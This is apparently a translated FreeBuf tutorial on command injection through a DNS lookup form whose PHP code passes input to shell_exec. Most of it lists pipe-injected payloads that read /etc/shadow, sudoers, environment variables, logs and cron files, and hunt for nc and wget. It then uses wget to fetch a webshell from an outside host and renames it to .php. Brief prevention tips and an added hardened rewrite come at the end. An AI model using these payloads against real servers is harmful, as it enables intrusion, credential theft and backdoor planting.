Malicious code injection using input boxes

Source: Internet
Author: User
Tags: echo command, nslookup

Now let's take a look:
This is the web interface of a DNS lookup service. You enter an IP address or a host name in the input box and submit the query.


The implementation of this page is not complex, as shown below:
<?php
if (isset($_POST["dns-lookup-php-submit-button"])) {
    try {
        if ($targethost_validated) {
            // $targethost is concatenated straight into the command line
            echo shell_exec("nslookup " . $targethost);
            $LogHandler->writeToLog($conn, "Executed operating system command: nslookup " . $lTargetHostText);
        } else {
            echo '<script>document.getElementById("id-bad-cred-tr").style.display=""</script>';
        } // end if ($targethost_validated)
    } catch (Exception $e) {
        echo $CustomErrorHandler->FormatError($e, "Input: " . $targethost);
    } // end try
} // end if (isset($_POST))
?>

Now we try to query the IP address 74.125.31.102.



Did you notice the shell_exec() function in the code above?
Now you should understand how this query interface is implemented: it simply runs a system command through shell_exec("nslookup " . $targethost), which makes it very easy to execute further system commands.

Next, we will try to inject malicious code.

In Linux, "&" can be used to chain commands, and ";" is the command separator.

Now we will make some attempts with the echo command. I personally prefer to use "|" instead of "&"; the reason is explained below.



| echo 'hello'

The input above is executed exactly as nslookup | echo 'hello' would be in a terminal.

Why do I use the pipe operator "|" instead? That will be explained.


Next we try to get more server information. Because we ran uname -a earlier, we can already identify the system: the Linux kernel release is 3.0.0-1, the network node host name is projectX, and the operating system is GNU/Linux. Let's check which Linux distribution the server runs:
| cat /etc/issue
| cat /etc/*-release
| cat /etc/lsb-release
| cat /etc/redhat-release


Ha, this is BackBox, my favorite Linux distribution. :) Let's see which directory we are in:
| pwd; ls -la




To collect more information, we need to check the services running on the server.
| ps aux
| ps -ef

| top

| cat /etc/services





 

To further discover vulnerabilities in the system, a penetration test is carried out using methods such as exploits.
You may need the following commands:
| cat /etc/environment
| cat /proc/self/environ
| cat /etc/shadow

| cat /etc/sudoers
| cat /etc/group

| cat /etc/security/group
| cat /etc/security/passwd
| cat /etc/security/user
| cat /etc/security/environ
| cat /etc/security/limits
| cat /usr/lib/security/mkuser.default

| cat /var/log/messages
| cat /var/log/mysql.log
| cat /var/log/user.log
| cat /var/www/logs/error_log

| cat /etc/syslog.conf
| cat /etc/chttp.conf
| cat /etc/lighttpd.conf
| cat /etc/cups/cupsd.conf
| cat /etc/inetd.conf
| cat /etc/apache2/apache2.conf

| cat /var/log/apache2/error.log
| cat /etc/my.conf
| cat /etc/httpd/conf/httpd.conf
| cat /opt/lampp/etc/httpd.conf
| ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

| cat /etc/resolv.conf
| cat /etc/sysconfig/network
| cat /etc/networks

| /sbin/ifconfig -a
| cat /etc/network/interfaces

| ls -alh /var/spool/cron
| ls -al /etc/ | grep cron
| ls -al /etc/cron*
| cat /etc/cron*
| cat /etc/at.allow
| cat /etc/at.deny
| cat /etc/cron.allow
| cat /etc/cron.deny
| cat /etc/crontab
| cat /etc/anacrontab
| cat /var/spool/cron/crontabs/root

Many attackers like to leave backdoors on Linux servers, so they first check which tools for fetching files are available on the host.
| find / -name wget
| find / -name nc*
| find / -name netcat*
| find / -name tftp*
| find / -name ftp*

Use wget to fetch a txt file:
| wget http://freebuf.com/thanks/unixhck.txt

Succeeded.

Naturally, in this case we can fetch a webshell with wget in the same way and then rename it:
| wget http://freebuf.com/backdoor.txt
| cp backdoor.txt backdoor.php

Then view our shell.

Several tips to prevent remote code execution:
1. Disable the shell_exec() function.
2. If you really need to use shell_exec(), use escapeshellarg() and escapeshellcmd() to escape the input before it reaches the shell.
3. Use a WAF or the mod_security module for interception and filtering.
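Added example, not the original page's code: a hardened rewrite of the DNS lookup handler that applies tip 2 together with an allowlist check, so that "|", ";" and "&" in the input can no longer reach the shell. The POST field name target_host is an assumption; the page does not show the HTML form.

```php
<?php
// Added example (not the page's code): hardened version of the DNS lookup handler.
// The field name "target_host" is assumed; the original form is not shown on the page.

// Allowlist: accept only an IPv4/IPv6 address or an RFC 1123 host name.
function is_valid_lookup_target(string $host): bool
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    // Labels of letters, digits and hyphens, 1-63 chars, no leading/trailing hyphen.
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return preg_match('/^' . $label . '(?:\.' . $label . ')*\.?$/i', $host) === 1;
}

function run_nslookup(string $host): string
{
    // The allowlist also rejects values such as "-debug", which escapeshellarg()
    // alone would pass through and nslookup would then read as an option.
    if (!is_valid_lookup_target($host)) {
        throw new InvalidArgumentException('Rejected lookup target');
    }
    // escapeshellarg() single-quotes the value, so "|", ";" and "&" reach
    // nslookup as literal characters instead of being parsed by the shell.
    $output = shell_exec('nslookup ' . escapeshellarg($host));
    return is_string($output) ? $output : '';
}

if (isset($_POST['dns-lookup-php-submit-button'])) {
    $targethost = trim((string)($_POST['target_host'] ?? ''));
    try {
        // Escape the output as well: nslookup echoes the submitted value back into the page.
        echo '<pre>' . htmlspecialchars(run_nslookup($targethost), ENT_QUOTES, 'UTF-8') . '</pre>';
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo 'Invalid host name or IP address.';
    }
}
```

With this version the injection attempts shown earlier (for example "| echo 'hello'") are rejected by the allowlist before any command runs, and even a value that slipped past it would be handed to nslookup as a single quoted argument.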

From FreeBuf.com
